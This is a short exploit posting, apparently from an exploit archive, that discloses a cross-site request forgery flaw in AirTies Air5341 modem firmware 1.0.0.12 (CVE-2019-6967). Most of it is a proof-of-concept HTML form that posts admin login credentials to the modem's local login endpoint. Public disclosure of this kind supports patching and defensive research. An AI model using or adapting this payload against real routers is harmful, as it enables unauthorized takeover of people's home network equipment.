AirTies Air5341 Modem 1.0.0.12 Cross Site Request Forgery

AirTies Air5341 modem version 1.0.0.12 suffers from a cross site request forgery vulnerability.


MD5 | dd1bae26d30daef9b6b51ca7d59d3ddf

# Exploit Title: AirTies Air5341 1.0.0.12 Modem CSRF Exploit & PoC
# Version: AirTies Modem Firmware 1.0.0.12
# Tested on: Windows 10 x64
# CVE : CVE-2019-6967
# Author : Ali Can GAPnA1/4llA1/4

<html>
<form method="POST" name="formlogin" action="
http://192.168.2.1/cgi-bin/login" target="_top" id="uiPostForm">
<input type="hidden" id="redirect" name="redirect">
<input type="hidden" id="self" name="self">
<input name="user" type="text" id="uiPostGetPage" value="admin"
size="">
<input name="password" type="password" id="uiPostPassword" size="">
<input onclick="uiDologin();" name="gonder" type="submit"
class="buton_text" id="__ML_ok" value="TAMAM"
style="background-image:url(images/buton_bg2.gif); height:21px;
width:110px; border: 0pt none">
</form>
</html>

Related Posts